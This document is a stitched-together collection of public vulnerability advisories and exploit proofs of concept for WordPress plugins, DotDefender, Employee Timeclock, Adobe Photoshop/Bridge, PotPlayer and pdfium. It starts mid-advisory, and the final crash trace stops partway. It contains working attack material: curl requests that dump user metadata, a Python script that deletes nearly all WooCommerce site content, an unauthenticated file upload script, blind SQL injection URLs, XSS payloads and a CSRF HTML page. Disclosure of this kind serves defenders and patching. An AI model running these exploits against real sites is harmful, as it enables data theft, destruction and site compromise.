=======================
Remote


Severity Level:
==================
High


Description:
==========================================================

Request Method(s):           [+] POST


Vulnerable Product:          [+] DotDefender v5.0 & v5.13

===========================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

by hyp3rlinx
HireHackking 
* Exploit Title: WordPress User Meta Manager Plugin [Information Disclosure]
* Discovery Date: 2015-12-28
* Public Disclosure Date: 2016-02-01
* Exploit Author: Panagiotis Vagenas
* Contact: https://twitter.com/panVagenas
* Vendor Homepage: http://jasonlau.biz/home/
* Software Link: https://wordpress.org/plugins/user-meta-manager/
* Version: 3.4.6
* Tested on: WordPress 4.4
* Category: webapps

## Description

User Meta Manager for WordPress plugin up to v3.4.6 suffers from a information disclosure vulnerability. Any registered user can perform an a series of AJAX 
requests, in order to get all contents of `usermeta` DB table. 

`usermeta` table holds additional information for all registered users. User Meta Manager plugin offers a `usermeta` table backup functionality. During the backup process the plugin takes no action in protecting the leakage of the table contents to unauthorized (non-admin) users.

## PoC

### Get as MySQL query

First a backup table must be created

 
curl -c ${USER_COOKIES} \
    "http://${VULN_SITE}/wp-admin/admin-ajax.php\
    ?action=umm_switch_action&umm_sub_action=umm_backup"


Then we get the table with another request

curl -c ${USER_COOKIES} \
    "http://${VULN_SITE}/wp-admin/admin-ajax.php\
    ?action=umm_switch_action&umm_sub_action=umm_backup&mode=sql"

### Get as CSV file

curl -c ${USER_COOKIES} \
    "http://${VULN_SITE}/wp-admin/admin-ajax.php\
    ?action=umm_switch_action&umm_sub_action=umm_get_csv"

## Solution

Upgrade to version 3.4.8
HireHackking 
'''
* Exploit Title: WordPress WooCommerce - Store Toolkit Plugin [Privilege Escalation]
* Discovery Date: 2016-02-06
* Public Disclosure Date: 2016-02-08
* Exploit Author: Panagiotis Vagenas
* Contact: https://twitter.com/panVagenas
* Vendor Homepage: http://www.visser.com.au/
* Software Link: https://wordpress.org/plugins/woocommerce-store-toolkit/
* Version: 1.5.5
* Tested on: WordPress 4.4.2
* Category: webapps

Description
-----------

The plugin "WooCommerce - Store Toolkit" for WordPress suffers from a privilege escalation vulnerability.

An attacker must have a valid user account which is possible simply by registering to the infected website. This is possible because this plugin must be installed in a website with WooCommerce plugin to be any of use. Since WooCommerce is an e-store plugin allows user registration by default, so we assume that all websites that have the "WooCommerce - Store Toolkit" plugin are also open to user registration.

As long as an attacker have an active account at the infected website he can perform the attack at ease because no action validation is taking place from the "WooCommerce - Store Toolkit" plugin. The "WooCommerce - Store Toolkit" plugin is designed to perform a set of actions like:

- Permanently delete all posts, post categories and post tags
- Permanently delete all media (attachments)
- Permanently delete all products, product categories, product tags and attributes
- Permanently delete all orders
- Permanently delete all comments

All these actions they normally require administrative wrights. But in this case any registered user can perform these actions, even with the most limited wrights, therefor this issue is considered as an Privilege Escalation vulnerability.

PoC
---

The following script will nuke nearly all site content from `example.com` using the account with username:`username` and password:`password`. This has to be an already registered account for this to work.
''' 

#!/usr/bin/python3

################################################################################
# WooCommerce - Store Toolkit Privilege Escalation Exploit
#
# **IMPORTANT** Don't use this in a production site, if vulnerable it will
# delete nearly all your site content
#
# Author: Panagiotis Vagenas <pan.vagenas@gmail.com>
################################################################################

import requests

loginUrl = 'http://example.com/wp-login.php'
adminUrl = 'http://example.com/wp-admin/index.php'

loginPostData = {
    'log': 'username',
    'pwd': 'password',
    'rememberme': 'forever',
    'wp-submit': 'Log+In'
}

l = requests.post(loginUrl, data=loginPostData)

if len(l.history) > 1:
    loggedInCookies = l.history[0].cookies
else:
    loggedInCookies = l.cookies

if len(loggedInCookies) == 0:
    print("Couldn't acquire a valid session")
    exit(1)

actions = [
    'woo_st_products',
    'woo_st_categories',
    'woo_st_product_categories',
    'woo_st_product_tags',
    'woo_st_product_brands',
    'woo_st_product_vendors',
    'woo_st_product_images',
    'woo_st_coupons',
    'woo_st_attributes',
    'woo_st_sales_orders',
    'woo_st_tax_rates',
    'woo_st_download_permissions',
    'woo_st_creditcards',
    'woo_st_google_product_feed',
    'woo_st_posts',
    'woo_st_post_categories',
    'woo_st_post_tags',
    'woo_st_links',
    'woo_st_comments',
    'woo_st_media_images'
]

for action in actions:
    print('Trying action '+action)
    a = requests.post(adminUrl, data={'action': 'nuke', action:1}, cookies=loggedInCookies, timeout=30)
    if a.status_code == 200:
        print('Nuked with action '+action)
    else:
        print('Something went wrong with action '+action)

exit(0)

'''
Solution
--------

Upgrade to v1.5.7

Timeline
--------

1. 2016-02-07: Vendor notified through WordPress support forums
2. 2016-02-07: Vendor notified through his homepage support
3. 2016-02-07: Requested CVE ID
4. 2016-02-07: Vendor responded
5. 2016-02-07: Send issue details to vendor
6. 2016-02-08: Vendor released version 1.5.7 which resolves this issue
'''
HireHackking 
'''
* Exploit Title: WordPress WP User Frontend Plugin [Unrestricted File Upload]
* Discovery Date: 2016-02-04
* Public Disclosure: 2016-02-08
* Exploit Author: Panagiotis Vagenas
* Contact: https://twitter.com/panVagenas
* Vendor Homepage: https://wedevs.com
* Software Link: https://wordpress.org/plugins/wp-user-frontend
* Version: < 2.3.11
* Tested on: WordPress 4.4.2
* Category: WebApps, WordPress


Description
-----------

WordPress plugin _WP User Frontend_ suffers from an unrestricted file uploade vulnerability. An attacker can exploit the `wpuf_file_upload` or `wpuf_insert_image` actions to upload any file which pass the WordPress mime and size checks.

The attack does not require any privilege to be performed. The mentioned actions are available to non-privileged users also, thus allowing to anyone uploading files to the web server.

PoC
---
'''
 

#!/usr/bin/python3

################################################################################
# WP User Frontend unrestricted file upload exploit
#
# Author: Panagiotis Vagenas <pan.vagenas@gmail.com>
################################################################################

import requests
import tempfile

url = 'http://example.com/wp-admin/admin-ajax.php'

postData = {
    'action': 'wpuf_file_upload'
}

file = tempfile.NamedTemporaryFile(mode='a+t', suffix='.jpeg')

file.write('A'*32)

file.seek(0)

files = {'wpuf_file': file}

r = requests.post(url, data=postData, files=files)

file.close()

if r.text != 'error':
    print('Success!')
    print(r.text)
else:
    print('error')

exit(0)

'''
Timeline
--------

1. **2016-02-04**: Vendor notified via support forums in WordPress.org
2. **2016-02-05**: Vendor responded
3. **2016-02-05**: Issue details send to vendor
4. **2016-02-06**: Requested CVE ID
5. **2016-02-06**: Vendor implemented security checks
6. **2016-02-06**: Verified that this exploit is no longer valid
7. **2016-02-08**: Vendor released v2.3.11 which resolves this issue
'''
HireHackking 
# Exploit Title: Wordpress booking calendar contact form <=v1.0.23 - Unauthenticated blind SQL injection
# Date: 2016-02-08
# Google Dork: Index of /wp-content/plugins/booking-calendar-contact-form
# Exploit Author: Joaquin Ramirez Martinez [ i0 SEC-LABORATORY ]
# Vendor Homepage: http://wordpress.dwbooster.com/
# Plugin URI: http://wordpress.dwbooster.com/calendars/booking-calendar-contact-form
# Version: 1.0.23
# Tested on: windows 10 + firefox. 

==============
 Description
==============

Create a booking form with a reservation calendar or a classic contact form, connected to 
a PayPal payment button.
With the **Booking Calendar Contact Form** you can create a **classic contact form** or a 
**booking form with a reservation calendar**, connected to a PayPal payment button. The reservation 
calendar lets the customer select the start (ex: check-in) and end (ex: checkout) dates.

The **reservation calendar** is an optional item, so it can be disabled to create a **general 
purpose contact form**.

There are two types of bookings available in the calendar configuration: full day bookings or 
partial day bookings. With full day bookings the whole day is blocked / reserved while in partial 
day bookings the start and end dates are partially blocked as used for example in 
**room/hotel bookings**.

===================
 Technical details 
===================

Booking calendar plugin  is prone to a blind sql injection because fails to sanitize a 
parameter used into a sql statement. 
The function ´dex_bccf_get_option´ uses a variable called ´CP_BCCF_CALENDAR_ID´ which is not sanitized
and is used as value for the ´id´ of sql parameter.
The vulnerable function is called into many other functions, and one of those is ´dex_bccf_calendar_load2´ 
which sets the ´CP_BCCF_CALENDAR_ID´ with the following code:

""
$calid = str_replace(TDE_BCCFCAL_PREFIX, "", @$_GET["id"]);
    if (!defined('CP_BCCF_CALENDAR_ID') && $calid != '-1')
        define('CP_BCCF_CALENDAR_ID', $calid);
""

and then the function ´dex_bccf_get_option´ is called into ´dex_bccf_calendar_load2´ function:

"" ...
$option = dex_bccf_get_option('calendar_overlapped', DEX_BCCF_DEFAULT_CALENDAR_OVERLAPPED);
   ...
""

The ´dex_bccf_calendar_load2´ function is called when we request the next url:

http://<wp-host>/<wp-path>/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent
&dex_bccf_calendar_load2=list&id=<SQLI commands>

A malicious unauthenticated user can exploit the sql injection and obtain all records from database.

==================
 Proof of concept
==================

http://localhost/wordpress/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent
&dex_bccf_calendar_load2=list&id=1%20and%20sleep(10)

###############################################################################

# Exploit Title: Wordpress booking calendar contact form <=v1.0.23 - Unauthenticated blind SQL injection
# Date: 2016-02-08
# Google Dork: Index of /wp-content/plugins/booking-calendar-contact-form
# Exploit Author: Joaquin Ramirez Martinez [ i0 SEC-LABORATORY ]
# Vendor Homepage: http://wordpress.dwbooster.com/
# Plugin URI: http://wordpress.dwbooster.com/calendars/booking-calendar-contact-form
# Version: 1.0.23
# Tested on: windows 10 + firefox.

==============
 Description
==============

Create a booking form with a reservation calendar or a classic contact form, connected to
a PayPal payment button.
With the **Booking Calendar Contact Form** you can create a **classic contact form** or a
**booking form with a reservation calendar**, connected to a PayPal payment button. The reservation
calendar lets the customer select the start (ex: check-in) and end (ex: checkout) dates.

The **reservation calendar** is an optional item, so it can be disabled to create a **general
purpose contact form**.

There are two types of bookings available in the calendar configuration: full day bookings or
partial day bookings. With full day bookings the whole day is blocked / reserved while in partial
day bookings the start and end dates are partially blocked as used for example in
**room/hotel bookings**.

===================
 Technical details
===================

Booking calendar plugin  is prone to a blind sql injection in the shortcode function ´dex_bccf_filter_content´
because there is not sanitization when the variable ´DEX_BCCF_CALENDAR_FIXED_ID´ is asigned and then is used
into function ´dex_bccf_get_public_form()´.

function dex_bccf_filter_content($atts) {
...
    extract(shortcode_atts(array(
        'calendar' => '',
        'user' => '',
                    ), $atts));
    if ($calendar != '')
        define('DEX_BCCF_CALENDAR_FIXED_ID', $calendar);
    ..

    return $buffered_contents;
}


function dex_bccf_get_public_form() {
    global $wpdb;

    if (defined('DEX_CALENDAR_USER') && DEX_CALENDAR_USER != 0)
        $myrows = $wpdb->get_results("SELECT * FROM " . DEX_BCCF_CONFIG_TABLE_NAME . " WHERE conwer=" . DEX_CALENDAR_USER);
    else if (defined('DEX_BCCF_CALENDAR_FIXED_ID'))
        $myrows = $wpdb->get_results("SELECT * FROM " . DEX_BCCF_CONFIG_TABLE_NAME . " WHERE id=" . DEX_BCCF_CALENDAR_FIXED_ID);
    else
        $myrows = $wpdb->get_results("SELECT * FROM " . DEX_BCCF_CONFIG_TABLE_NAME);
 ...
 }


==================
 Proof of concept
==================

An editor/author can add a ahortcode with his sql command into a post:


[CP_BCCF_FORM calendar=-1 or sleep(10)#]

###############################################################################

# Exploit Title: Wordpress booking calendar contact form <=v1.0.23 - Privilege escalation / stored XSS vulnerabilities
# Date: 2016-02-08
# Google Dork: Index of /wp-content/plugins/booking-calendar-contact-form
# Exploit Author: Joaquin Ramirez Martinez [ i0 SEC-LABORATORY ]
# Vendor Homepage: http://wordpress.dwbooster.com/
# Plugin URI: http://wordpress.dwbooster.com/calendars/booking-calendar-contact-form
# Version: 1.0.23
# Tested on: windows 10 + firefox.

==============
 Description
==============

Create a booking form with a reservation calendar or a classic contact form, connected to
a PayPal payment button.
With the **Booking Calendar Contact Form** you can create a **classic contact form** or a
**booking form with a reservation calendar**, connected to a PayPal payment button. The reservation
calendar lets the customer select the start (ex: check-in) and end (ex: checkout) dates.

The **reservation calendar** is an optional item, so it can be disabled to create a **general
purpose contact form**.

There are two types of bookings available in the calendar configuration: full day bookings or
partial day bookings. With full day bookings the whole day is blocked / reserved while in partial
day bookings the start and end dates are partially blocked as used for example in
**room/hotel bookings**.

===================
 Technical details
===================

Booking calendar contact form plugin for wordpress is prone to multiple privilege escalation and stored XSS
vulnerabilities because does not verify if a user that make a request for update the plugin options,
add or delete a ´season price´ and add/delete/update an item to booking list is a privileged user and does not
sanitize the supplied information.

An authenticated user can exploit these vulnerabilities.

==================
 Proof of concept
==================

1) Add a ´season price´ with XSS Payload in parameter ´price´.

http://<wp-path>/<ap-path>/wp-admin/admin-ajax.php?action=dex_bccf_check_posted_data&dex_bccf=loadseasonprices
&add=1&dex_item=1&price=%3E%22%3Cimg%20src=x%20onerror=alert(/u_r_owned/)%3E%22%3C&dfrom=&dto

2) Delete a ´season price´ with specified ´code´

http://<wp-host>/<wp-path>/wp-admin/admin-ajax.php?action=dex_bccf_check_posted_data
&dex_bccf=loadseasonprices&delete=1&code=1


3) Own a calendars if you have an account like ´suscriptor´ role and inject a XSS payload into ´name parameter´:
http://<wp-hots>/<wp-path>/wp-admin/admin.php?page=dex_bccf.php&u=<my user id>&public=1&owner=1&name=<XSS payload>


4) Update charset of booking calendar tables:
http://<wp-host>/<wp-path>/wp-admin/admin.php?page=dex_bccf.php&ac=st&chs=<my supplied charset>


5) Delete a booking calendar item if you are logged in as suscriptor:
http://localhost/wordpress/wp-admin/admin.php?page=dex_bccf.php&cal=1&list=1&ld=<id of calendar to delete>


6)  Unrestricted update options / stored XSS in some parameters ( PoC html )


<html>
  <!-- CSRF PoC - generated by Burp Suite i0 SecLab plugin

email_confirmation_to_user,calendar_language,calendar_mode,calendar_pages,currency,cv_text_enter_valid_captcha
 and other parameters are vulnerables to stored XSS

url_ok,url_cancel can be used to redirect a user and make fishing attacks
´dex_item´  value is the ´id´ of the calendar.
   -->
<body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://localhost:80/wordpress/wp-admin/admin.php?page=dex_bccf.php&cal=1&r=0.5076911114737157", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
        xhr.setRequestHeader("Accept-Language", "es-MX,es-ES;q=0.9,es;q=0.7,es-AR;q=0.6,es-CL;q=0.4,en-US;q=0.3,en;q=0.1");
        xhr.withCredentials = true;
        var body = "dex_bccf_post_options=1&dex_item=1&calendar_enabled=true&selDay_startcal1=&selMonth_startcal1=&selYear_startcal1=&selDay_endcal1=&selMonth_endcal1=&selYear_endcal1=\">\"<img><\"&calendar_pages=2&calendar_language=\">\"<img><\"&calendar_weekday=0&calendar_dateformat=0&calendar_overlapped=false&calendar_showcost=1&calendar_mode=\">\"<img><\"&calendar_mindate=today&calendar_maxdate=\">\"<img><\"&calendar_minnights=%22%3E%22%3Cimg%3E%3C%22&calendar_maxnights=%22%3E%22%3Cimg%3E%3C%22&wd1=1&wd2=1&wd3=1&wd4=1&wd5=1&wd6=1&wd7=1&sd1=1&sd2=1&sd3=1&sd4=1&sd5=1&sd6=1&sd7=1&calendar_fixedreslength=1&calendar_holidays=&calendar_startres=&currency=%22%3E%22%3Cimg%3E%3C%22&request_cost=%22%3E%22%3Cimg%3E%3C%22&max_slots=0&calendar_suplementminnight=%22%3E%22%3Cimg%3E%3C%22&calendar_suplementmaxnight=%22%3E%22%3Cimg%3E%3C%22&calendar_suplement=%22%3E%22%3Cimg%3E%3C%22&calendar_depositenable=0&calendar_depositamount=0&calendar_deposittype=0&dex_dc_price=%22%3E%22%3Cimg%3E%3C%22&dex_dc_season_dfrom=%22%3E%22%3Cimg%3E%3C%22&dex_dc_season_dto=%22%3E%22%3Cimg%3E%3C%22&paypal_email=%22%3E%22%3Cimg%3E%3C%22%40email_here.com&paypal_product_name=%22%3E%22%3Cimg%3E%3C%22&url_ok=http%3A%2F%2Flocalhost%2Fwordpress&url_cancel=http%3A%2F%2Flocalhost%2Fwordpress&paypal_language=%22%3E%22%3Cimg%3E%3C%22&request_taxes=%22%3E%22%3Cimg%3E%3C%22&form_structure=%5B%5B%7B%22name%22%3A%22email%22%2C%22index%22%3A0%2C%22title%22%3A%22Email%22%2C%22ftype%22%3A%22femail%22%2C%22userhelp%22%3A%22%22%2C%22csslayout%22%3A%22%22%2C%22required%22%3Atrue%2C%22predefined%22%3A%22%22%2C%22size%22%3A%22medium%22%7D%2C%7B%22name%22%3A%22subject%22%2C%22index%22%3A1%2C%22title%22%3A%22Subject%22%2C%22required%22%3Atrue%2C%22ftype%22%3A%22ftext%22%2C%22userhelp%22%3A%22%22%2C%22csslayout%22%3A%22%22%2C%22predefined%22%3A%22%22%2C%22size%22%3A%22medium%22%7D%2C%7B%22name%22%3A%22message%22%2C%22index%22%3A2%2C%22size%22%3A%22large%22%2C%22required%22%3Atrue%2C%22title%22%3A%22Message%22%2C%22ftype%22%3A%22ftextarea%22%2C%22userhelp%22%3A%22%22%2C%22csslayout%22%3A%22%22%2C%22predefined%22%3A%22%22%7D%5D%2C%5B%7B%22title%22%3A%22%22%2C%22description%22%3A%22%22%2C%22formlayout%22%3A%22top_aligned%22%7D%5D%5D&sTitle=Email&sShortlabel=&sNametag=%3C%25email%25%3E&sName=email&sSize=medium&sRequired=on&sEqualTo=&sPredefined=&sUserhelp=&sCsslayout=&vs_text_submitbtn=%22%3E%22%3Cimg%3E%3C%22&vs_text_previousbtn=%22%3E%22%3Cimg%3E%3C%22&vs_text_nextbtn=%22%3E%22%3Cimg%3E%3C%22&vs_use_validation=DEX_BCCF_DEFAULT_vs_use_validation&vs_text_is_required=This+field+is+required.&vs_text_is_email=%22%3E%22%3Cimg%3E%3C%22%40mail.com&cv_text_enter_valid_captcha=Please+enter+a+valid+captcha+code.&vs_text_datemmddyyyy=%22%3E%22%3Cimg%3E%3C%22&vs_text_dateddmmyyyy=%22%3E%22%3Cimg%3E%3C%22&vs_text_number=%22%3E%22%3Cimg%3E%3C%22&vs_text_digits=%22%3E%22%3Cimg%3E%3C%22&vs_text_max=%22%3E%22%3Cimg%3E%3C%22&vs_text_min=%22%3E%22%3Cimg%3E%3C%22&cp_cal_checkboxes_type1=0&cp_cal_checkboxes1=&notification_from_email=%22%3E%22%3Cimg%3E%3C%22%40email_here.com&notification_destination_email=%22%3E%22%3Cimg%3E%3C%22%40email_here.com&email_subject_notification_to_admin=%22%3E%22%3Cimg%3E%3C%22&email_notification_to_admin=New+reservation+made+with+the+following+information%3A%0D%0A%0D%0A%22%3E%22%3Cimg%3E%3C%22%0D%0A%0D%0ABest+regards.&cu_user_email_field=email&email_subject_confirmation_to_user=%22%3E%22%3Cimg%3E%3C%22&email_confirmation_to_user=We+have+received+your+request+with+the+following+information%3A%0D%0A%0D%0A%25INFORMATION%25%0D%0A%0D%0A%22%3E%22%3Cimg%3E%3C%22%0D%0A%0D%0ABest+regards.&dexcv_enable_captcha=true&dexcv_width=%22%3E%22%3Cimg%3E%3C%22&dexcv_height=%22%3E%22%3Cimg%3E%3C%22&dexcv_chars=%22%3E%22%3Cimg%3E%3C%22&dexcv_min_font_size=%22%3E%22%3Cimg%3E%3C%22&dexcv_max_font_size=%22%3E%22%3Cimg%3E%3C%22&dexcv_noise=%22%3E%22%3Cimg%3E%3C%22&dexcv_noise_length=%22%3E%22%3Cimg%3E%3C%22&dexcv_background=%22%3E%22%3Cimg%3E%3C%22&dexcv_border=%22%3E%22%3Cimg%3E%3C%22&dexcv_font=font-1.ttf&submit=Save+Changes";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>


==========
 CREDITS
==========

Vulnerability discovered by:
	Joaquin Ramirez Martinez [i0 security-lab]
	joaquin.ramirez.mtz.lab[at]gmail[dot]com
	https://www.facebook.com/I0-security-lab-524954460988147/
	https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q


========
TIMELINE
========

2016-02-01 vulnerability discovered
2016-02-05 reported to vendor
2016-02-08 released fixed plugin v1.0.24
2016-02-08 public disclosure
HireHackking 
source: http://www.securityfocus.com/archive/1/509995

======================================================================

Secunia Research 10/03/2010

- Employee Timeclock Software SQL Injection Vulnerabilities -

======================================================================
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

======================================================================
1) Affected Software

* Employee Timeclock Software 0.99

NOTE: Other versions may also be affected.

======================================================================
2) Severity

Rating: Moderately critical
Impact: Manipulation of data
Where: Remote

======================================================================
3) Vendor's Description of Software

"Timeclock-software.net's free software product will be a simple
solution to allow your employees to record their time in one central
location for easy access.".

Product Link:
http://timeclock-software.net/

======================================================================
4) Description of Vulnerability

Secunia Research has discovered some vulnerabilities in Employee
Timeclock Software, which can be exploited by malicious people to
conduct SQL injection attacks.

Input passed to the "username" and "password" parameters in auth.php
and login_action.php is not properly sanitised before being used in
SQL queries. This can be exploited to manipulate SQL queries by
injecting arbitrary SQL code.

======================================================================
5) Solution

Edit the source code to ensure that input is properly sanitised.

======================================================================
6) Time Table

25/02/2010 - Vendor notified.
04/03/2010 - Vendor notified again.
10/03/2010 - Public disclosure.

======================================================================
7) Credits

Discovered by Secunia Research.

======================================================================
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2010-0122 for the vulnerability.

======================================================================
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

======================================================================
10) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2010-11/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

======================================================================
HireHackking 
#####################################################################################

Application: Adobe Photoshop CC & Bridge CC PNG file parsing memory corruption

Platforms: Windows

Versions: Bridge CC 6.1.1 and earlier versions

Version: Photoshop CC 16.1.1 (2015.1.1) and earlier versions

CVE; 2016-0952

Author: Francis Provencher of COSIG

Twitter: @COSIG_

#####################################################################################

1) Introduction
2) Report Timeline
3) Technical details
4) POC

#####################################################################################

===============
1) Introduction
===============

Adobe Photoshop is a raster graphics editor developed and published by Adobe Systems for Windows and OS X.

(https://en.wikipedia.org/wiki/Adobe_Photoshop)

#####################################################################################

============================
2) Report Timeline
============================

2015-11-11: Francis Provencher from COSIG report the issue to PSIRT (ADOBE);

2016-02-09: Adobe release a patch (APSB16-03);

2016-02-09: COSIG release this advisory;

#####################################################################################

============================
3) Technical details
============================

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Photoshop CC & Bridge CC. User interaction is required to exploit this vulnerability in that the target must open a malicious file. By providing a malformed PNG file with an invialid uint32 CRC checksum, an attacker can cause an heap memory corruption. An attacker could leverage this to execute arbitrary code under the context of the application.

#####################################################################################

===========

4) POC

===========

(Theses files must be in the same folder for Bridge CC)

http://protekresearchlab.com/exploits/COSIG-2016-09-1.png
http://protekresearchlab.com/exploits/COSIG-2016-09-2.png

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39430.zip

###############################################################################
HireHackking 
#####################################################################################

Application: Adobe Photoshop CC & Bridge CC PNG file parsing memory corruption

Platforms: Windows

Versions: Bridge CC 6.1.1 and earlier versions

Version: Photoshop CC 16.1.1 (2015.1.1) and earlier versions

CVE; 2016-0951

Author: Francis Provencher of COSIG

Twitter: @COSIG_

#####################################################################################

1) Introduction
2) Report Timeline
3) Technical details
4) POC

#####################################################################################

===============
1) Introduction
===============

Adobe Photoshop is a raster graphics editor developed and published by Adobe Systems for Windows and OS X.

(https://en.wikipedia.org/wiki/Adobe_Photoshop)

#####################################################################################

============================
2) Report Timeline
============================

2015-11-11: Francis Provencher from COSIG report the issue to PSIRT (ADOBE);

2016-02-09: Adobe release a patch (APSB16-03);

2016-02-09: COSIG release this advisory;

#####################################################################################

============================
3) Technical details
============================

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Photoshop CC & Bridge CC. User interaction is required to exploit this vulnerability in that the target must open a malicious file. By providing a malformed PNG file with an invalid uint32 Length, an attacker can cause an heap memory corruption. An attacker could leverage this to execute arbitrary code under the context of the application.

#####################################################################################

===========

4) POC

===========

(Theses files must be in the same folder for Bridge CC)

http://protekresearchlab.com/exploits/COSIG-2016-08-1.png
http://protekresearchlab.com/exploits/COSIG-2016-08-2.png

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39429.zip


###############################################################################
HireHackking 
# Exploit Title: POTPLAYER 1.6.5x MP3 CRASH POC
# Date: 08-02-2016
# Exploit Author: Shantanu Khandelwal
# Vendor Homepage: https://potplayer.daum.net/
# Software Link: (32-Bit) http://get.daum.net/PotPlayer/v3/PotPlayerSetup.exe
# Software Link: (64-Bit) http://get.daum.net/PotPlayer64/v3/PotPlayerSetup64.exe
# Version: 1.6.5x
# Tested on: Windows XP Sp3,Windows 8,Windows 10
# CVE : unknown at the moment
#============================================================================================
#Description: Read Access Violation on Block Data Mo#ve #Short Description:
ReadAVonBlockMove #Exploitability Classification: PROBABLY_EXPLOITABLE
#============================================================================================
#==================================================
#(8a4.d54): Access violation - code c0000005 (first chance) #First chance
exceptions are reported before any exception handling. #This exception may
be expected and handled. #eax=05d46659 ebx=05bb2998 ecx=00000011
edx=00000000 esi=05c68ffd edi=0012edd4 #eip=01b62e1e esp=0012e9dc
ebp=0363ad80 iopl=0 nv up ei pl nz ac po nc #cs=001b ss=0023 ds=0023
es=0023 fs=003b gs=0000 efl=00010212 #*** ERROR: Symbol file could not be
found. Defaulted to export symbols for C:\Program
Files\DAUM\PotPlayer\PotPlayer.dll -
#===========================================================

POTPLAYER has buffer overflow in png parser of image of MP3 offset 5B .
Crash is because of '\x22' at offset 5B

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39428.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=613

The following crash was encountered in pdfium (the Chrome PDF renderer) during PDF fuzzing:

--- cut ---
$ ./pdfium_test asan_heap-uaf_9d42b5_2729_a5aed985095e827c725b94e7b6a4d4ed 
Rendering PDF file asan_heap-uaf_9d42b5_2729_a5aed985095e827c725b94e7b6a4d4ed.
Non-linearized path...
=================================================================
==22386==ERROR: AddressSanitizer: heap-use-after-free on address 0x606000001160 at pc 0x000000b604dc bp 0x7ffd824f3c70 sp 0x7ffd824f3c68
READ of size 8 at 0x606000001160 thread T0
    #0 0xb604db in opj_t2_read_packet_header third_party/libopenjpeg20/t2.c:874:54
    #1 0xb5edd9 in opj_t2_decode_packet third_party/libopenjpeg20/t2.c:536:15
    #2 0xb5e06c in opj_t2_decode_packets third_party/libopenjpeg20/t2.c:422:39
    #3 0xb1b309 in opj_tcd_t2_decode third_party/libopenjpeg20/tcd.c:1555:15
    #4 0xb1adc1 in opj_tcd_decode_tile third_party/libopenjpeg20/tcd.c:1294:15
    #5 0xa5ef5f in opj_j2k_decode_tile third_party/libopenjpeg20/j2k.c:8065:15
    #6 0xa9d214 in opj_j2k_decode_tiles third_party/libopenjpeg20/j2k.c:9596:23
    #7 0xa51e2c in opj_j2k_exec third_party/libopenjpeg20/j2k.c:7286:41
    #8 0xa6b690 in opj_j2k_decode third_party/libopenjpeg20/j2k.c:9796:15
    #9 0xaba6ed in opj_jp2_decode third_party/libopenjpeg20/jp2.c:1483:8
    #10 0xa39d8d in opj_decode third_party/libopenjpeg20/openjpeg.c:412:10
    #11 0x786a19 in CJPX_Decoder::Init(unsigned char const*, unsigned int) core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:742:11
    #12 0x78b63c in CCodec_JpxModule::CreateDecoder(unsigned char const*, unsigned int, bool) core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:866:10
    #13 0xec1c9b in CPDF_DIBSource::LoadJpxBitmap() core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:689:24
    #14 0xeb8296 in CPDF_DIBSource::CreateDecoder() core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:645:5
    #15 0xeb0cf9 in CPDF_DIBSource::StartLoadDIBSource(CPDF_Document*, CPDF_Stream const*, int, CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:365:13
    #16 0xe8a295 in CPDF_ImageCache::StartGetCachedBitmap(CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:308:7
    #17 0xe89a99 in CPDF_PageRenderCache::StartGetCachedBitmap(CPDF_Stream*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:143:13
    #18 0xed4f7e in CPDF_ProgressiveImageLoaderHandle::Start(CPDF_ImageLoader*, CPDF_ImageObject const*, CPDF_PageRenderCache*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1561:11
